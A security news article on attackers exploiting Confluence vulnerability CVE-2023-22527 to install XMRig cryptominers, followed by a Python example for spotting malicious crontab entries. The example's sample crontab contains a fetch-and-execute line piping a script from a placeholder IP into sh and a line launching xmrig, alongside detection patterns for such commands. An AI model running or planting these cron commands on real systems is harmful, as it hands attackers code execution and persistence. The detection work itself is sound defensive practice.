Threat actors are actively exploiting a patched critical security flaw affecting the Atlassian Confluence data center and Confluence server to conduct illegal cryptocurrency mining on sensitive instances.
“Attacks involve threat actors using techniques such as deploying shell scripts and XMRig miners, targeting SSH endpoints, killing competing crypto mining processes, and maintaining security through cron jobs,” Trend Micro researcher Abdelrahman Esmail said.
The exploited vulnerability, CVE-2023-22527, is a maximum-severity bug in older versions of Atlassian Confluence Data Center and Confluence Server that allows unauthenticated attackers to achieve remote code execution. Atlassian, the Australian software company, patched it in mid-January 2024.
Trend Micro said that between mid-June and the end of July 2024 it observed a large number of attempts to exploit the flaw in order to deploy the XMRig miner on unpatched hosts. At least three different threat actors are said to be behind the activity, using approaches that include:
- Running the XMRig miner via an ELF file payload using specially crafted queries
- Using a shell script that first kills competing cryptomining campaigns (such as Kinsing), deletes all existing cron jobs, removes cloud security tools from Alibaba and Tencent, and collects system information, before setting up a new cron job that checks the command-and-control (C2) server connection every five minutes and starts the miner
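The cron-based persistence described above leaves a recognisable footprint in crontabs: a short-interval schedule combined with a download-and-execute command, or a command that launches a known miner binary. The following is an added detection example written for this article, not code from Trend Micro's report or from the campaign; the crontab lines and the 203.0.113.10 address are constructed for illustration.

```python
import re

# Constructed sample crontab content (not taken from the report or from any real host).
SAMPLE_CRONTAB = """\
# legitimate housekeeping
0 2 * * * /usr/bin/certbot renew --quiet
*/5 * * * * curl -s http://203.0.113.10/x.sh | sh
@reboot /opt/xmrig/xmrig --config=/opt/xmrig/config.json
30 1 * * 0 /usr/sbin/logrotate /etc/logrotate.conf
"""

FIVE_MIN_SCHEDULE = re.compile(r"^\*/5\s+\*\s+\*\s+\*\s+\*$")          # weak signal on its own
FETCH_AND_EXEC = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")        # download piped into a shell
MINER_NAMES = re.compile(r"xmrig|kinsing", re.IGNORECASE)              # names mentioned in the report

WEAK = "five-minute schedule"


def parse_cron_line(line):
    """Split one crontab line into schedule and command; None for blanks/comments/malformed."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    if line.startswith("@"):                      # @reboot, @hourly, ...
        tokens = line.split(None, 1)
        return {"schedule": tokens[0], "command": tokens[1] if len(tokens) > 1 else ""}
    parts = line.split(None, 5)
    if len(parts) < 6:
        return None
    return {"schedule": " ".join(parts[:5]), "command": parts[5]}


def classify_cron_entry(entry):
    """Return the list of indicators matched by a parsed entry (may be empty)."""
    reasons = []
    if FIVE_MIN_SCHEDULE.match(entry["schedule"]):
        reasons.append(WEAK)
    if FETCH_AND_EXEC.search(entry["command"]):
        reasons.append("downloads and pipes a script into a shell")
    if MINER_NAMES.search(entry["command"]):
        reasons.append("known miner name in command")
    return reasons


def find_suspicious_cron_entries(crontab_text):
    """Flag entries with at least one strong indicator; a 5-minute schedule alone is not enough."""
    findings = []
    for line in crontab_text.splitlines():
        entry = parse_cron_line(line)
        if entry is None:
            continue
        reasons = classify_cron_entry(entry)
        if reasons and reasons != [WEAK]:
            findings.append((line.strip(), reasons))
    return findings
```

Run it against `crontab -l` output for each user plus the files under `/etc/cron.d` to cover both the user and system crontabs the script may have rewritten.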
“Due to continued exploitation by threats, CVE-2023-22527 poses a significant security risk to organizations around the world,” Esmail said.
“To minimize the risk and threat associated with this vulnerability, administrators should update their versions of Confluence Data Center and Confluence Server to the latest available versions as soon as possible.”